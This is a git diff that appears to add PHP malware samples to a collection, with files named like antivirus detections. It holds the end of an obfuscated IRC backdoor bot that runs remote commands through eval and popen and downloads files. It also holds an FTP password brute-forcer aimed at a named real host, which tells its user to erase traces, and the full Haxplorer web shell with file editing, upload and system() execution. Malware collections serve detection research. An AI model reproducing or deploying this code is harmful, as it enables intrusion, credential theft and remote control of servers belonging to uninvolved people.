\2".$zdfff0a7fa1a55[2]."\2 To \2".$zdfff0a7fa1a55[1]."\2"); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r") . " \2".$zdfff0a7fa1a55[2]."\2 To \2".$zdfff0a7fa1a55[1]."\2"); +} } break; case l69923efad5b7a("p5ykqaE="): if (count($zdfff0a7fa1a55) > 2) { if (chown($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2hvd24vLyBDaG93bmVk") ." \2".$zdfff0a7fa1a55[1]."\2 To \2".$zdfff0a7fa1a55[2]."\2"); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=") ." \2".$zdfff0a7fa1a55[1]."\2 To \2".$zdfff0a7fa1a55[2]."\2"); +} } break; case l69923efad5b7a("p5yioZc="): if (count($zdfff0a7fa1a55) > 2) { if(chmod($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2htb2QvLyBDaG1vZGRlZA==") . " \2".$zdfff0a7fa1a55[1]."\2 with permissions \2".$zdfff0a7fa1a55[2]."\2"); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=") . " \2".$zdfff0a7fa1a55[1]."\2"); +} } break; case l69923efad5b7a("sZ+Zm6U="): if (count($zdfff0a7fa1a55) > 1) { if (mkdir($zdfff0a7fa1a55[1])) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==")." \2".$zdfff0a7fa1a55[1]."\2"); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==")." \2".$zdfff0a7fa1a55[1]."\2"); +} } break; case l69923efad5b7a("tqGZm6U="): if (count($zdfff0a7fa1a55)>1) { if (rmdir($zdfff0a7fa1a55[1])) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==") . " \2".$zdfff0a7fa1a55[1]."\2"); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==") . " \2".$zdfff0a7fa1a55[1]."\2"); +} } break; case l69923efad5b7a("p6Q="): if (count($zdfff0a7fa1a55) > 2) { if (copy($zdfff0a7fa1a55[1], $zdfff0a7fa1a55[2])) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q1AvLyBDb3BpZWQ=") ." \2".$zdfff0a7fa1a55[1]."\2 to \2".$zdfff0a7fa1a55[2]."\2"); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("Q1AvLyBGYWlsZWQgdG8gY29weQ==") ." \2".$zdfff0a7fa1a55[1]."\2 to \2".$zdfff0a7fa1a55[2]."\2"); +} } break; case l69923efad5b7a("sZWeng=="): if (count($zdfff0a7fa1a55)>4) { $p099fb995346f3 = "From: <".$zdfff0a7fa1a55[2].">\r\n"; +if (mail($zdfff0a7fa1a55[1], $zdfff0a7fa1a55[3], substr($n78e731027d8fd,$zdfff0a7fa1a55[4]), $p099fb995346f3)) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TWFpbC8v") . " Message sent to \2".$zdfff0a7fa1a55[1]."\2"); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TWFpbC8v") . " Send failure"); +} } break; case l69923efad5b7a("sZ+ilmg="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TUQ1Ly8=") . " ".md5($zdfff0a7fa1a55[1])); +break; case l69923efad5b7a("qKKo"): if (isset($zdfff0a7fa1a55[1])) { $m957b527bcfbad = explode(".",$zdfff0a7fa1a55[1]); +if (count($m957b527bcfbad)==4 && is_numeric($m957b527bcfbad[0]) && is_numeric($m957b527bcfbad[1]) && is_numeric($m957b527bcfbad[2]) && is_numeric($m957b527bcfbad[3])) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RE5TLy8=") . " ".$zdfff0a7fa1a55[1]." -> ".gethostbyaddr($zdfff0a7fa1a55[1])); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("RE5TLy8=") . " ".$zdfff0a7fa1a55[1]." -> ".gethostbyname($zdfff0a7fa1a55[1])); +} } break; case l69923efad5b7a("tpmoppSWqQ=="): q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("UVVJVCA6UVVJVC4uLg==")); +fclose($j351a1d2ad68bc); rfc35fdc70d5fc(); break; case l69923efad5b7a("tqI="): if(isset($zdfff0a7fa1a55[1])) { +$m8052146769b14 = ad988971435842((int)$zdfff0a7fa1a55[1]); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); +} else { $m8052146769b14 = ad988971435842($aec12e0af93cb5['mrnd']); q56eacb300613d($j351a1d2ad68bc, ob5d21085bf2c0("TklDSw==")." $m8052146769b14"); +} break; case l69923efad5b7a("tJyl"): if (count($zdfff0a7fa1a55) > 1) { eval(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0]))); +} break; case l69923efad5b7a("q5mp"): if (count($zdfff0a7fa1a55) > 2) { if (!($k0666f0acdeed3 = fopen($zdfff0a7fa1a55[2],"w"))) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ=")); +} else { if (!($eb5eda0a74558a = file($zdfff0a7fa1a55[1]))) { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I=")); +} else { for ($i865c0c0b4ab0e = 0; $i865c0c0b4ab0e < count($eb5eda0a74558a); $i865c0c0b4ab0e++) { fwrite($k0666f0acdeed3,$eb5eda0a74558a[$i865c0c0b4ab0e]); +} df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("R2V0Ly8=") . " \2".$zdfff0a7fa1a55[1]."\2 downloaded to \2".$zdfff0a7fa1a55[2]."\2"); +} fclose($k0666f0acdeed3); } } break; case l69923efad5b7a("sp0="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("TmV0SW5mby8v") . " IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']); +break; case l69923efad5b7a("t50="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("U3lzaW5mby8v") . " [User: ".get_current_user()."] [PID: ".getmypid()."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: ".$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: ".$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: ".$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]"); +break; case l69923efad5b7a("tKOnpqKUmuw="): if (isset($zdfff0a7fa1a55[1],$zdfff0a7fa1a55[2])) { if (fsockopen($zdfff0a7fa1a55[1],(int)$zdfff0a7fa1a55[2],$t56bd7107802eb,$m341be97d9aff9,5)) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "".ob5d21085bf2c0("UG9ydENoay8v") ." ".$zdfff0a7fa1a55[1].":".$zdfff0a7fa1a55[2]." is \2Open\2"); +} else { df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "".ob5d21085bf2c0("UG9ydENoay8v") ." ".$zdfff0a7fa1a55[1].":".$zdfff0a7fa1a55[2]." is \2Closed\2"); +} } break; case l69923efad5b7a("uaKWn5g="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("VW5hbWUvLw==")." " .php_uname()); +break; case l69923efad5b7a("rZg="): df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("SUQvLw==")." ".getmypid()); +break; case l69923efad5b7a("p6GZ"): if (count($zdfff0a7fa1a55)>1) { $p1dccadfed7bcb = popen(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0])),"r"); +while (!feof($p1dccadfed7bcb)) { $k734515cbd3636 = trim(fgets($p1dccadfed7bcb,512)); if (strlen($k734515cbd3636)>0) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, "> ".$k734515cbd3636); sleep(1); } +} df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("PiBbRU9GXQ==")); +} break; case l69923efad5b7a("qayalaiYmg=="): h54d54a126a783(substr($n78e731027d8fd,strlen($zdfff0a7fa1a55[0]))); +break; } } else { switch(substr($zdfff0a7fa1a55[0],1)) { case l69923efad5b7a("bg=="): if (isset($zdfff0a7fa1a55[1]) && md5($zdfff0a7fa1a55[1]) == jf9feaa9bcab30($aec12e0af93cb5['pa']) && preg_match(jf9feaa9bcab30($aec12e0af93cb5['ha']),$m67b3dba8bc677)) { +df2f4e964f79d0($j351a1d2ad68bc, $d73be252ca8221, $e01b6e20344b68, ob5d21085bf2c0("UmVhZHkvLyBPaw==")); +$see11cbb19052e[$m67b3dba8bc677] = TRUE; } else { df2f4e964f79d0($j351a1d2ad68bc, FALSE, jf9feaa9bcab30($aec12e0af93cb5['ch']), ob5d21085bf2c0("UmVhZHkvLyByZWplY3RlZA==")); +} break; } } } } $td707b8140a662 = $f7fabc1404929c; } fclose($j351a1d2ad68bc); sleep(3); rfc35fdc70d5fc(); +} else { shuffle($b59b514174bffe); rfc35fdc70d5fc(); } } function q56eacb300613d($s317d37b0edc7b, $n78e731027d8fd) { +fwrite($s317d37b0edc7b,"$n78e731027d8fd\r\n"); } function df2f4e964f79d0($s317d37b0edc7b, $d73be252ca8221, $e01b6e20344b68, $n78e731027d8fd) { +if($d73be252ca8221 != TRUE) { q56eacb300613d($s317d37b0edc7b, ob5d21085bf2c0("UFJJVk1TRw==")." $e01b6e20344b68 :$n78e731027d8fd"); +} } function l69923efad5b7a($yc7a1ddb19daba) { $lb4a88417b3d01 = ''; $yc7a1ddb19daba = base64_decode($yc7a1ddb19daba); +for($i865c0c0b4ab0e=0; $i865c0c0b4ab0e \ No newline at end of file diff --git a/PHP/HackTool.PHP.Brute.a b/PHP/HackTool.PHP.Brute.a new file mode 100644 index 00000000..abc89153 --- /dev/null +++ b/PHP/HackTool.PHP.Brute.a @@ -0,0 +1,81 @@ + +* @URL : http://www.greeknetizen.net/ +* @DESCTIPTION: +* This PHP script tries a password +* from the password file each time intil it finds it. +* Execute it from a webpage on your server, not from +* the command line(!). And remember to clear your +* traces if you succeed in cracking the password +* of the FTP account you desire. And once again, +* I am not responsible for any of your actions +* with this code. +*/ + +error_reporting(E_PARSE); //we want any exception except from WARNING MESSAGES +set_time_limit(0); // set the time limit for the script to +oo + +$passwordfile = "passwd.dic"; //this is the path to the passwordfile +$targethost = "www.bahoosh.net"; //change this to the host you want to attack +$usrname = "bahoosh"; // change this to the username + // of the FTP account you want + // to attack +$interval = 1; // this is the break the script each time it tries a password + // do not set this to zero + +//change the second arguments you desire +$crh = "Sorry, the host you specified cannot be retrieved!"; +$cc = "Sorry, I cannot connect to $targethost with $username and password: $trypassword
    "; + + +/* DO NOT CHAGE ANYTHING BELOW THIS LINE UNLESS YOU REALLY KNOW WHAT YOU ARE DOING */ + +if(!file_exists($passwordfile)) { + die("Sorry, the passwordfile $passwordfile cannot be retrieved"); +} else { + // open connection funtion + function openconnection($targethost,$username,$trypassword) { + print "
    Trying password $trypassword for ".$username." to $targethost

    "; + $ftp_conn = @ftp_connect($targethost) or print $crh; + if($ftp_conn) { + $trylogin = @ftp_login($ftp_conn,$username,$trypassword); + if(!$trylogin) { + print $cc; + } else { + print "The password is: $trypassword
    "; + @ftp_quit($ftp_conn); + break; + } + } + } + //end of function + + // try to open the password file + $fp = @fopen($passwordfile,"r"); + if(!$fp) { + die("The password file cannot open"); + } else { + print "The passwordfile is forked!"; + //get the passwords + while($trypassword = @fgets($fp,1024)) { + openconnection($targethost,$usrname,$trypassword); + sleep($interval); + } + } + //...and close the password file or die of errors + @fclose($fp) or die("\n
    \nCannot close the password file!\n"); + echo "The password file has closed"; + +} + +// when you succeed connecting to your victim's server +// do not forget to delete your traces +?> \ No newline at end of file diff --git a/PHP/HackTool.PHP.Haxplorer.c b/PHP/HackTool.PHP.Haxplorer.c new file mode 100644 index 00000000..72017ed7 --- /dev/null +++ b/PHP/HackTool.PHP.Haxplorer.c @@ -0,0 +1,2026 @@ +=4); + +$scriptTitle = "PHPShell"; + +$scriptident = "$scriptTitle by MAX666"; + + + +$urlAdd = ""; + +$formAdd = ""; + + + +function walkArray($array){ + + while (list($key, $data) = each($array)) + + if (is_array($data)) { walkArray($data); } + + else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} + +} + + + +if (isset($_PUT)) walkArray($_PUT); + +if (isset($_GET)) walkArray($_GET); + +if (isset($_POST)) walkArray($_POST); + + + + + +$pos = strpos($urlAdd, "s=r"); + +if (strval($pos) != "") { + +$urlAdd= substr($urlAdd, 0, $pos); + +} + + + +$urlAdd .= "&s=r&"; + + + +if (empty($Pmax)) + + $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */ + +if (empty($Pidx)) + + $Pidx = 0; + + + +$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); + +$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + + + +$scriptdate = "For Server Hacking"; + +$scriptver = "Private Exploit"; + +$LOCAL_IMAGE_DIR = "img"; + +$REMOTE_IMAGE_URL = "img"; + +$img = array( + + "Edit" => "edit.gif", + + "Download" => "download.gif", + + "Upload" => "upload.gif", + + "Delete" => "delete.gif", + + "View" => "view.gif", + + "Rename" => "rename.gif", + + "Move" => "move.gif", + + "Copy" => "copy.gif", + + "Execute" => "exec.gif" + + ); + + + +while (list($id, $im)=each($img)) + + if (file_exists("$LOCAL_IMAGE_DIR/$im")) + + $img[$id] = "\"$id\""; + + else + + $img[$id] = "[$id]"; + + + + + + + + + +/* HTTP AUTHENTICATION */ + + + + if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { + + setcookie("noauth",""); + + Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); + + Header( "HTTP/1.0 401 Unauthorized"); + + echo "Your username or password is incorrect"; + + exit ; + + + + } + + + +function buildUrl($display, $url) { + + global $urlAdd; + + $url = $SFileName . "?$urlAdd$url"; + + return "$display"; + +} + + + +function sp($mp) { + + for ( $i = 0; $i < $mp; $i++ ) + + $ret .= " "; + + return $ret; + +} + + + +function spacetonbsp($instr) { return str_replace(" ", " ", $instr); } + + + +function Mydeldir($Fdir) { + + if (is_dir($Fdir)) { + + $Fh=@opendir($Fdir); + + while ($Fbuf = readdir($Fh)) + + if (($Fbuf != ".") && ($Fbuf != "..")) + + Mydeldir("$Fdir/$Fbuf"); + + @closedir($Fh); + + return rmdir($Fdir); + + } else { + + return unlink($Fdir); + + } + +} + + + + + +function arrval ($array) { + +list($key, $data) = $array; + +return $data; + +} + + + +function formatsize($insize) { + + $size = $insize; + + $add = "B"; + + if ($size > 1024) { + + $size = intval(intval($size) / 1.024)/1000; + + $add = "KB"; + + } + + if ($size > 1024) { + + $size = intval(intval($size) / 1.024)/1000; + + $add = "MB"; + + } + + if ($size > 1024) { + + $size = intval(intval($size) / 1.024)/1000; + + $add = "GB"; + + } + + if ($size > 1024) { + + $size = intval(intval($size) / 1.024)/1000; + + $add = "TB"; + + } + + return "$size $add"; + +} + + + +if ($cmd != "downl") { + + ?> + + + + + + + + + + + + <?php echo $SFileName ?> + + + + + +
    + + + + + + + + + +
    + + + + + + + + + +
    + +
    + + + + - - + + + +
    + +

    + + + + ".sp(3)."\n\n\n\n + + COULD NOT OPEN THIS DIRECTORY!!!
    ".sp(3)."\n + + THE SCRIPT WILL RESULT IN AN ERROR!!! + +

    ".sp(3)."\n + + PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR... + +

    \n\n\n\n"; + + } + + if (function_exists('realpath')) { + + $partdir = realpath($dir); + + } + + else { + + $partdir = $dir; + + } + + if (strlen($partdir) >= 100) { + + $partdir = substr($partdir, -100); + + $pos = strpos($partdir, "/"); + + if (strval($pos) != "") { + + $partdir = "<-- ...".substr($partdir, $pos); + + } + + $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); + + $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); + + $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + + } + + ?> + +
    " method="POST"> + + + + + + + + + +
    + +
     HAXPLORER - Server Files Browser... 
    + +
    + +
    + + + + + + + + + + + +
    + +  Browsing:  + + + + + + + + + + + + + +
     GO 
    + + + +
    + + + + + + + + + + + + + + + + + + + + $Pmax ) { + + $from = $Pidx * $Pmax; + + $to = ($Pidx + 1) * $Pmax-1; + + if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) + + $to = count($filelist) - 1; + + if ($to > count($filelist)-1) + + $to = count($filelist)-1; + + $Dcontents = array(); + + For ($Fi = $from; $Fi <= $to; $Fi++) { + + $Dcontents[] = $filelist[$Fi]; + + } + + + + } + + else { + + $Dcontents = $filelist; + + } + + + + $tdcolors = array("lighttd", "darktd"); + + + + while (list ($key, $file) = each ($Dcontents)) { + + if (!$tdcolor=arrval(each($tdcolors))) { + + reset($tdcolors); + + $tdcolor = arrval(each($tdcolors)); } + + + + if (is_dir("$dir/$file")) { /* */ + + /* */ + + echo "\n"; + + /* */ + + echo "\n"; + + /* */ + + echo "\n"; + + /* */ + + echo "\n"; + + /* */ + + echo ""; + + echo "\n"; + + + + } + + else { /* */ + + /* */ + + if ( @is_readable("$dir/$file") ) + + echo "\n"; + + else + + echo "\n"; + + /* */ + + echo "\n"; + + /* */ + + echo "\n"; + + + + /* */ + + echo "\n"; + + /* */ + + echo ""; + + echo "\n"; + + } + + } + + + + echo "
    + +  Filename  + + + +  Actions (Attempt to perform)  + + + +  Size  + + + +  Attributes  + + + +  Modification Date  + +
    ".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."
    ".sp(2)."\n"; + + /* */ + + if ( ($file != ".") && ($file != "..") ) + + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + + /* */ + + if ( ($file != ".") && ($file != "..") ) + + echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + + /* */ + + echo "  
       \n"; + + echo "D"; + + if ( @is_readable("$dir/$file") ) { + + echo "R"; + + } + + if (function_exists('is_writeable')) { + + if ( @is_writeable("$dir/$file") ) { + + echo "W"; + + } + + } + + else { + + echo "(W)"; + + } + + if ( @is_executable("$dir/$file") ) { + + echo "X"; + + } + + echo "  \n"; + + echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; + + echo "
    ".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."
    ".sp(3).$file.sp(9)."
      \n"; + + /* */ + + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + + /* */ + + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + + echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; + + /* */ + + echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; + + /* */ + + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + + echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; + + /* */ + + echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + + /* */ + + echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; + + /* */ + + if ( @is_executable("$dir/$file") ) + + echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; + + /* */ + + echo sp(2)."
    \n"; + + $size = @filesize("$dir/$file"); + + If ($size != false) { + + $filesizes += $size; + + echo "  ".formatsize($size).""; + + } + + else + + echo "  0 B"; + + echo "    \n"; + + + + if ( @is_readable("$dir/$file") ) + + echo "R"; + + if ( @is_writeable("$dir/$file") ) + + echo "W"; + + if ( @is_executable("$dir/$file") ) + + echo "X"; + + if (function_exists('is_uploaded_file')){ + + if ( @is_uploaded_file("$dir/$file") ) + + echo "U"; + + } + + else { + + echo "(U)"; + + } + + echo "  \n"; + + echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; + + echo "
    \n\n"; + + + + function printpagelink($a, $b, $link = ""){ + + if ($link != "") + + echo "| $a - $b |"; + + else + + echo "| $a - $b |"; + + } + + + + if ( count($filelist)-1 > $Pmax ) { + + echo ""; + + } + + + + + + echo "
    \n"; + + echo "  ".@count ($dirn)." Dir(s), ".@count ($filen)." File(s)  \n"; + + echo "\n"; + + echo "  Total filesize: ".formatsize($filesizes)."  
    Page:
    "; + + $Fi = 0; + + while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { + + $from = $Fi*$Pmax; + + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + + $to = ($Fi + 1) * $Pmax - 1; + + if ($Fi == $Pidx) + + $link=""; + + else + + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + + echo "   "; + + $Fi++; + + } + + $from = $Fi*$Pmax; + + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + + $to = count($filelist)-1; + + if ($Fi == $Pidx) + + $link=""; + + else + + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + + + + + + echo "
    \n
    "; + + + + if ($isGoodver) { + + echo "\n"; + + } + + else { + + echo "\n"; + + } + + /* */ + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo ""; + + echo "
     Server's PHP Version:    $PHPVer 
     Server's PHP Version:    $PHPVer (Some functions might be unavailable...) 
     Other actions:    ".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). + + buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). + + buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "\n
     Script Location:    $PATH_TRANSLATED
     Your IP:    $REMOTE_ADDR 
     Browsing Directory:   $partdir 
     Legend:  \n"; + + echo ""; + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo "
    D:  Directory.
    R:  Readable.
    W:  Writeable.
    X:  Executable.
    U:  HTTP Uploaded File.
    "; + + echo "
    "; + + @closedir($h); + + } + + elseif ( $cmd=="execute" ) {/**/ + + echo system("$file"); + + } + +elseif ( $cmd=="deldir" ) { /* */ + + echo "
    "; + +} + + elseif ( $cmd=="delfile" ) { /* */ echo "
    " ; + + if ($auth == "yes") { + + if (Mydeldir($file)==false) { + + echo "Could not remove \"$file\"
    Permission denied, or directory not empty..."; + + } + + else { + + echo "Successfully removed \"$file\"
    "; + + } + + echo ""; + + } + + else { + + echo "Are you sure you want to delete \"$file\" and all it's subdirectories ? + +
    + + + + + + + + + + + +
    + +
    + + + + + +
    "; + + } + + echo "
    "; + +} + +elseif ( $cmd=="newfile" ) { /* */ + + echo "
    " ; + + if ($auth == "yes") { + + if (@unlink($file)==false) { + + echo "Could not remove \"$file\"
    "; + + } + + else { + + echo "Successfully removed \"$file\"
    "; + + } + + echo "
    "; + + } + + else { + + echo "Are you sure you want to delete \"$file\" ? + +
    + + + + + + + + + + + + + +
    + +
    + + + + + +
    "; + + } + + echo "
    "; + + $i = 1; + + while (file_exists("$lastdir/newfile$i.txt")) + + $i++; + + $file = fopen("$lastdir/newfile$i.txt", "w+"); + + if ($file == false) + + echo "Could not create the new file...
    "; + + else + + echo "Successfully created: \"$lastdir/newfile$i.txt\"
    "; + + echo " + +
    + + + + + + + +
    + +
    "; + + } + +elseif ( $cmd=="newdir" ) { /* */ + + echo "
    " ; + + $i = 1; + + while (is_dir("$lastdir/newdir$i")) + + $i++; + + $file = mkdir("$lastdir/newdir$i", 0777); + + if ($file == false) + + echo "Could not create the new directory...
    "; + + else + + echo "Successfully created: \"$lastdir/newdir$i\"
    "; + + echo "
    + + + + + + + +
    "; + +} + +elseif ( $cmd=="edit" ) { /* */ + + $contents = ""; + + $fc = @file( $file ); + + while ( @list( $ln, $line ) = each( $fc ) ) { + + $contents .= htmlentities( $line ) ; + + } + + echo "
    "; + + echo "M
    \n"; + + echo "\n"; + + echo "EDIT FILE: $file
    \n"; + + echo "
    \n"; + + echo "\n"; + + echo ""; + + echo "
    "; + + echo "
    "; + +} + +elseif ( $cmd=="saveedit" ) { /* */ + + $fo = fopen($file, "w"); + + $wrret = fwrite($fo, stripslashes($contents)); + + $clret = fclose($fo); + +} + +elseif ( $cmd=="downl" ) { /* */ + + $downloadfile = urldecode($file); + + if (function_exists("basename")) + + $downloadto = basename ($downloadfile); + + else + + $downloadto = "download.ext"; + + if (!file_exists("$downloadfile")) + + echo "The file does not exist"; + + else { + + $size = @filesize("$downloadfile"); + + if ($size != false) { + + $add="; size=$size"; + + } + + else { + + $add=""; + + } + + header("Content-Type: application/download"); + + header("Content-Disposition: attachment; filename=$downloadto$add"); + + $fp=fopen("$downloadfile" ,"rb"); + + fpassthru($fp); + + flush(); + + } + +} + +elseif ( $cmd=="upload" ) { /* */ + + ?> + +
    + + + + + + + + + +
    + + Welcome to the upload section... + + Please note that the destination file will be + +
    overwritten if it already exists!!!

    + +
    " method="post"> + + + + + + + + + + + + Select local file:
    + +
    + + + +
    + +
    + +
    " method="POST"> + + + + + + + +
    + +
    + +
    + + + + */ + + echo "
    "; + + if (file_exists($userfile)) + + $res = copy($userfile, "$dir/$userfile_name"); + + echo "Uploaded \"$userfile_name\" to \"$userfile\";
    \n"; + + if ($res) { + + echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n

    "; + + echo "Local filename: \"$userfile_name\".\n
    Remote filename: \"$userfile\".\n
    "; + + echo "Filesize: ".formatsize($userfile_size).".\n
    Filetype: $userfile_type.\n
    "; + + } + + else { + + echo "Could not move uploaded file; Action aborted..."; + + } + + echo "
    " ; + + echo "

    "; + +} + +elseif ( $cmd=="file" ) { /* */ + + echo "
    "; + + $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { + + echo spacetonbsp(@htmlentities($line))."
    \n"; + + } + + echo "
    "; + +} + +elseif ( $cmd=="ren" ) { /* */ + + if (function_exists('is_dir')) { + + if (is_dir("$oldfile")) { + + $objname = "Directory"; + + $objident = "Directory"; + + } + + else { + + $objname = "Filename"; + + $objident = "file"; + + } + + } + + echo "
     Rename a file: 

    \n"; + + If (empty($newfile) != true) { + + echo "
    "; + + $return = @rename($oldfile, "$olddir$newfile"); + + if ($return) { + + echo "$objident renamed successfully:

    Old $objname: \"$oldfile\".
    New $objname: \"$olddir$newfile\""; + + } + + else { + + if ( @file_exists("$olddir$newfile") ) { + + echo "Error: The $objident does already exist...

    \"$olddir$newfile\"

    Hit your browser's back to try again..."; + + } + + else { + + echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; + + } + + } + + echo "
